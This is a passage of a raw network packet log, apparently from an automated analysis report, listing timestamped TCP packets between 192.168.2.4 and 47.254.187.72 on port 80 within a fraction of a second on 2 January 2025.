                                                                            Jan 2, 2025 20:34:57.278069973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.278081894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.278091908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.278101921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.278106928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.278112888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.278125048 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.278135061 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.278155088 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.281969070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.282054901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.282064915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.282077074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.282078028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.282090902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.282100916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.282111883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.282113075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.282145977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.282162905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.285002947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.285022974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.285031080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.285046101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.285068035 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.285069942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.285079956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.285089970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.285099983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.285100937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.285131931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.285152912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.285157919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.285186052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303440094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303461075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303507090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303517103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303528070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303535938 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303535938 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303539991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303550959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303560972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303565025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303580046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303596973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303611994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303622007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303628922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303639889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303649902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303651094 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303661108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303668022 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303687096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303688049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303711891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303736925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303764105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303775072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303785086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303798914 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303824902 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303864002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303874969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303885937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303901911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303906918 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303913116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303929090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.303951025 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.303968906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.304660082 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.304678917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.304687977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.304737091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.304744959 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.304744959 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.304747105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.304758072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.304766893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.304778099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.304783106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.304800987 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.304812908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.310054064 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.310064077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.310075045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.310085058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.310095072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.310105085 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.310108900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.310115099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.310153008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.310158014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.310234070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.313366890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.313376904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.313393116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.313402891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.313419104 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.313427925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.313438892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.313451052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.313452959 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.313462019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.313466072 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.313467026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.313503981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.319509029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.319521904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.319531918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.319541931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.319557905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.319567919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.319575071 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.319581985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.319593906 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.319597006 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.319614887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.319631100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.322328091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.322340965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.322350979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.322364092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.322380066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.322411060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.322418928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.322422028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.322432041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.322448015 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.322448015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.322474003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.322500944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.327761889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.327773094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.327826977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.327867985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.327878952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.327888966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.327898979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.327909946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.327914000 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.327919960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.327936888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.327955961 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.338161945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.338184118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.338232994 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.338263988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.338287115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.338296890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.338301897 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.338332891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.338341951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.338352919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.338363886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.338380098 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.339759111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.342619896 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.342696905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.342719078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.342729092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.342739105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.342753887 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.342755079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.342766047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.342776060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.342777967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.342786074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.342807055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.342828989 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.361138105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.361161947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.361171007 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.361181974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.361191988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.361205101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.361207962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.361218929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.361228943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.361239910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.361246109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.361265898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.361278057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.369638920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.369678020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.369687080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.369693041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.369697094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.369708061 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.369710922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.369735003 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.369765997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.369834900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.369852066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.369862080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.369874001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.369875908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.369893074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.369921923 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.372275114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.372284889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.372302055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.372313023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.372317076 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.372322083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.372332096 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.372338057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.372344017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.372354031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.372370005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.372379065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.372380018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.372397900 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.372425079 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.373231888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373241901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373260021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373270035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373270988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.373281956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373291969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373301983 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.373302937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373323917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.373334885 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.373704910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373714924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373749971 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.373769045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373780012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373790026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373805046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373814106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.373815060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373826027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373830080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.373840094 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.373869896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.390366077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390419006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390429974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390440941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390450954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390460968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.390461922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390472889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390489101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.390516043 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.390566111 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390575886 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390587091 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390597105 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390604973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.390607119 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390616894 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390628099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390636921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390645027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.390657902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390664101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.390680075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.390687943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.390687943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390705109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390738010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390739918 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.390753031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390763998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390774965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390775919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.390789986 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.390799046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.390813112 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.390831947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.391402960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.391448975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.391475916 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.391484976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.391495943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.391505957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.391511917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.391515970 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.391525984 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.391531944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.391560078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.391560078 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.391592979 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.396876097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.396898031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.396908998 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.396919012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.396920919 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.396929026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.396939039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.396949053 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.396955013 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.396979094 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.397006989 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.400125027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.400171041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.400176048 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.400180101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.400197029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.400203943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.400207043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.400217056 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.400221109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.400227070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.400237083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.400239944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.400248051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.400269032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.400284052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.406239986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.406271935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.406282902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.406303883 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.406341076 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.406357050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.406368017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.406378031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.406389952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.406397104 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.406399012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.406419992 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.406450033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.409091949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.409110069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.409118891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.409133911 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.409141064 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.409154892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.409162998 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.409167051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.409174919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.409193993 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.409197092 CET804973047.254.187.72192.168.2.4
